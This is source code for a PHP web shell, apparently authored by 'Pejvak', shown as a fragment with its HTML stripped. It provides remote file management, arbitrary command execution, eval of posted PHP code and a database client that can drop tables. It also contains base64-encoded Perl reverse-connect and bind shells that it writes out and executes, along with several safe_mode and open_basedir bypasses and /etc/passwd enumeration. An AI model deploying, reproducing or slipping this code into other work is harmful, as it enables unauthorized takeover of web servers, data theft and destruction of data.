'; $end='

Coded by Amin Shokohi (Pejvak)
Oh My God!
Permission Denied".$end; if ($_GET['do']=="edit" && $_GET['filename']!="dir"){ if(is_readable($_GET['address'].$_GET['filename'])){ $opedit=fopen($_GET['address'].$_GET['filename'],"r"); while(!feof($opedit)) $data.=fread($opedit,9999); fclose($opedit); echo $head.$formp.$nowaddress.'

File Name : '.$_GET['address'].$_GET['filename'].'
'.htmlspecialchars("$data", ENT_QUOTES).'

'.$end;exit; }else{echo $deny;exit;}} function sizee($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } function deleteDirectory($dir) { if (!file_exists($dir)) return true; if (!is_dir($dir) || is_link($dir)) return unlink($dir); foreach (scandir($dir) as $item) { if ($item == '.' || $item == '..') continue; if (!deleteDirectory($dir . "/" . $item)) { chmod($dir . "/" . $item, 0777); if (!deleteDirectory($dir . "/" . $item)) return false; };}return rmdir($dir);} if($_GET['do']=="rename"){ echo $head.$formp.$nowaddress.'
To
'.$end;exit; } if ($_REQUEST['cdirname']){ if(is_writable($_REQUEST['address'])){ mkdir($_REQUEST['address'].$slash.$_REQUEST['cdirname'],"0777");}else{echo $deny;exit;}} function bcn($ipbc,$pbc){ $bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3 NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0 KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4 ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow=="; $opbc=fopen("bcc.pl","w"); fwrite($opbc,base64_decode($bcperl)); fclose($opbc); system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode"); } function wbp($wb){ $wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g"; $opwb=fopen("wbp.pl","w"); fwrite($opwb,base64_decode($wbp)); fclose($opwb); echo getcwd(); system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode"); } function lbp($wb){ $lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7 b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g"; $oplb=fopen("lbp.pl","w"); fwrite($oplb,base64_decode($lbp)); fclose($oplb); system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode"); } if($_REQUEST['portbw']){ wbp($_REQUEST['portbw']); }if($_REQUEST['portbl']){ lbp($_REQUEST['portbl']); } if($_REQUEST['ipcb'] && $_REQUEST['portbc']){ bcn($_REQUEST['ipcb'],$_REQUEST['portbc']); } if($_REQUEST['do']=="bc"){ echo $head.$formp."
Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )
<<<<<< Back Connect >>>>>>
Ip Address : Port :
".$formp."
Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )
<<<<<< Windows Bind Port >>>>>>
Port :
".$formp."
Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )
<<<<<< Linux Bind Port >>>>>>
Port :
".$end;exit; } if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){ if(is_writable($_REQUEST['cpyto'])){ copy($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto']); }else{echo $deny;exit;}} if($_REQUEST['cfilename']){ echo $head.$formp.$nowaddress.'
Create File

'.$end;exit; } if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){ if(is_writable($_REQUEST['address'])){ $ofile4c=fopen($_REQUEST['address'].$slash.$_REQUEST['nf4c'],"w"); fwrite($ofile4c,$_REQUEST['nf4cs']); fclose($ofile4c); }else{echo $deny;exit;}} function sqlclienT(){ global $t,$errorbox,$et,$hcwd; if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ $server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; $db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB']; $_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUEST['useR']; } if (isset ($_GET[select_db])){ $getdb=$_GET[select_db]; $_SESSION[db]=$getdb; $query="SHOW TABLES"; $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); } elseif (isset ($_GET[select_tbl])){ $tbl=$_GET[select_tbl]; $_SESSION[tbl]=$tbl; $query="SELECT * FROM `$tbl`"; $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); } elseif (isset ($_GET[drop_db])){ $getdb=$_GET[drop_db]; $_SESSION[db]=$getdb; $query="DROP DATABASE `$getdb`"; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'',$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'','SHOW DATABASES'); } elseif (isset ($_GET[drop_tbl])){ $getbl=$_GET[drop_tbl]; $query="DROP TABLE `$getbl`"; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],'SHOW TABLES'); } elseif (isset ($_GET[drop_row])){ $getrow=$_GET[drop_row]; $getclm=$_GET[clm]; $query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'"; $tbl=$_SESSION[tbl]; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`"); } else $res=querY($type,$server,$user,$pass,$db,$query); if($res){ $res=htmlspecialchars($res); $row=array (); $title=explode('[+][+][+]',$res); $trow=explode('[-][-][-]',$title[1]); $row=explode('|+|+|+|+|+|',$title[0]); $data=array(); $field=$trow[count($trow)-2]; if (strstr($trow[0],'Database')!='') $obj='db'; elseif (substr($trow[0],0,6)=='Tables') $obj='tbl'; else $obj='row'; $i=0; foreach ($row as $a){ if($a!='') $data[$i++]=explode('|-|-|-|-|-|',$a); } echo ""; foreach ($trow as $ti) echo ""; echo ""; $j=0; while ($data[$j]){ echo ""; foreach ($data[$j++] as $dr){ echo ""; } echo ""; } echo "
$ti
"; if($obj!='row') echo ""; echo $dr; if($obj!='row') echo ""; echo " Drop

"; } if(empty($_REQUEST['typE']))$_REQUEST['typE']=''; echo "
Connect to Database
DB Type:
Server Address:
Username:
Password:
Submit a Query
DB Name:
Query: "; if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES'; echo "
$hcwd
$et"; } function querY($type,$host,$user,$pass,$db='',$query){ $res=''; switch($type){ case 'MySQL': if(!function_exists('mysql_connect'))return 0; $link=mysql_connect($host,$user,$pass); if($link){ if(!empty($db))mysql_select_db($db,$link); $result=mysql_query($query,$link); if ($result!=1){ while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|'; $res.='[+][+][+]'; for($i=0;$i '; if(FALSE==curl_exec($ch)) die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.'); echo ' '; curl_close($ch); } if ($_REQUEST['bypcu']){ bypcu($_REQUEST['bypcu']); } if($_REQUEST['do']=="bypasscmd"){ if($_POST['bycw']){ echo $_POST['bycw']; $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll'); $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw'].""); $stdout = $exec->StdOut(); $stcom = $stdout->ReadAll();} echo $head.'
';if($_POST['byws']){passthru("\\".$_POST['byws']);} echo $stcom.'
Bypass Safe_Mode And Disable_Functions In Windows Server
'.$formp.'Command
Bypass Safe_Mode Windows Server
'.$formp.'Command
'.$end;exit;; } if($_REQUEST['do']=="bypassdir"){ if($_POST['byoc']){ if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){ $bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder"; }else{$bopens="Can Not Bypass This";} } if($_POST['byfc']){ curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__); $debfc=curl_exec($ch); } if($_POST['byetc']){ for($bye=0;$bye<40000;$bye++){ //cat /etc/passwd $sbep =$sbep. posix_getpwuid($bye); }} if($_POST['byfc9']){ echo "not sucsfull"; } if($_REQUEST['bysyml']){ $file=$_REQUEST['bysyml']; bywsym($file); } echo $head.'
';if($_POST['byws']){passthru("\\".$_POST['byws']);}if(isset($sbep)){for($fbe=0;$fbe<count($sbep);$fbe++){echo $sbep[$fbe];}} if(isset($debfc)){var_dump($debfc);} echo $bopens.'
Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2
'.$formp.'Address File
Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4
'.$formp.'Address File
Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9
'.$formp.'Address File
Bypass /Etc/Passwd
'.$formp.'
Bypass With ini_restore'.$formp.'
Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink
'.$formp.'
'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9
'.$formp.'
'.$end;exit;; } if($_POST['nameren'] && $_POST['addressren']){ if(is_writable($_REQUEST['addressren'])){ rename($_POST['addressren'],$_POST['nameren']);}else{echo $deny;exit;} } if($_GET['do']=="delete"){ if ($_GET['type']=="dir"){ if(is_writable($_REQUEST['address'])){ $dir=$_GET['address'].$_GET['filename']; deleteDirectory($dir); }elseif($_GET['type']=="file"){ if(is_writable($_GET['address'].$_GET['filename'])){ unlink($_GET['address'].$_GET['filename']);}else{echo $deny;exit;} } }} if($_POST['fedit'] && $_POST['namefe']){ if(is_writable($_REQUEST['address'])){ $opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w"); echo bazam; fwrite($opensave,$_POST['fedit']); fclose($opensave);}else{echo $deny;exit;} } if ($_POST['evalsource']){ eval($_POST['evalsource']); } if($_GET['do']=="eval"){ echo $head.$formp.$nowaddress.'

'.$end;exit; } if($_GET['do']=="info"){ if(ini_get('safe_mode')){ $safe_modes="On"; }else{ $safe_modes="Off"; } if(ini_get('disable_functions')){ $disablef=ini_get('disable_functions'); }else{ $disablef="All Functions Enable"; } if(ini_get('register_globals')){ $registerg="Enable"; }else{ $registerg="disable"; } if(extension_loaded('curl')){ $curls="Enable"; }else{ $curls="disable"; } if(@function_exists('mysql_connect')){ $db_on = "Mysql : On"; }; if(@function_exists('mssql_connect')){ $db_on = "Mssql : On"; }; if(@function_exists('pg_connect')){ $db_on = "PostgreSQL : On"; };if(@function_exists('ocilogon')){ $db_on = "Oracle : On"; }; echo $head."Operating System : ".php_uname()."
Server Name : ".$_SERVER['HTTP_HOST']."
Disable_Functions : ".$disablef."
Safe_Mode : ".$safe_modes."
Openbase_dir : ".ini_get('openbase_dir')."
Php Version : ".phpversion()."
Free Space : ".sizee(disk_free_space("/"))."
Total Space : ".sizee(disk_total_space("/"))."
Register_Globals : ".$registerg."
Curl : ".$curls."
Database ".$db_on."
Server Name : ".$_SERVER['HTTP_HOST']."
Admin Server : ".$_SERVER['SERVER_ADMIN'].$end; exit; } if ($_GET['do']=="cmd"){ echo $head.'

';if (strlen($_GET['command'])>1 && $_GET['execmethod']!="popen"){ echo $_GET['execmethod']($_GET['command']);} if (strlen($_GET['command'])>1 && $_GET['execmethod']=="popen"){ popen($_GET['command'],"r");} echo'

'.$end;exit;} if($_GET['do']=="db"){ echo $head;sqlclienT();echo $end; exit; } if($_REQUEST['file2ch'] && $_REQUEST['chmodnow']){ $chmodnum2=$_REQUEST['chmodnow']; chmod($_REQUEST['file2ch'],"0".$chmodnum2); } if($_GET['do']=="chmod"){ echo $head.$formg.$nowaddress."
Chmod
To
".$end;exit; } if($_GET['do']=="edit"){ if($_GET['filename']=="dir"){ if(is_readable($_GET['address'].$_GET['filew'])){ chdir($_GET['address'].$_GET['filew']);}else{echo $deny;exit;} }} $araddresss=explode($slash,getcwd()); $matharrayy=count($araddresss)-1; $addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss); for($countback=0;$countback'; $ad=getcwd(); $hand=opendir("$ad"); while (false !== ($fileee = readdir($hand))) { if ($fileee != "." && $fileee != "..") { if (filetype($fileee)=="dir"){ $fil=$fil.'

'.$fileee.'
'.date("y/m/d", filectime($fileee)).' '.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).' Ren Del
' ;} else{ $file=$file.'

'.$fileee.'
'.sizee(filesize($fileee)).' '.date("y/m/d", filectime($fileee)).' '.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).' Edit Ren Del
' ;} } } echo $head.'

Now Directory : '.$backaddresss.'
Back

'.$fil.$file.'

'.$formg.'Change Directory
Upload --->	'.$nowaddress.' '.$ifupload.'
'.$formp.'Chmod ----> File :	Permission :
'.$formp.'Create Dir ----> Dirctory Name	'.$nowaddress.'
'.$formp.'Create File ----> Name File	'.$nowaddress.'
'.$formp.'Copy ----> File :	To Directory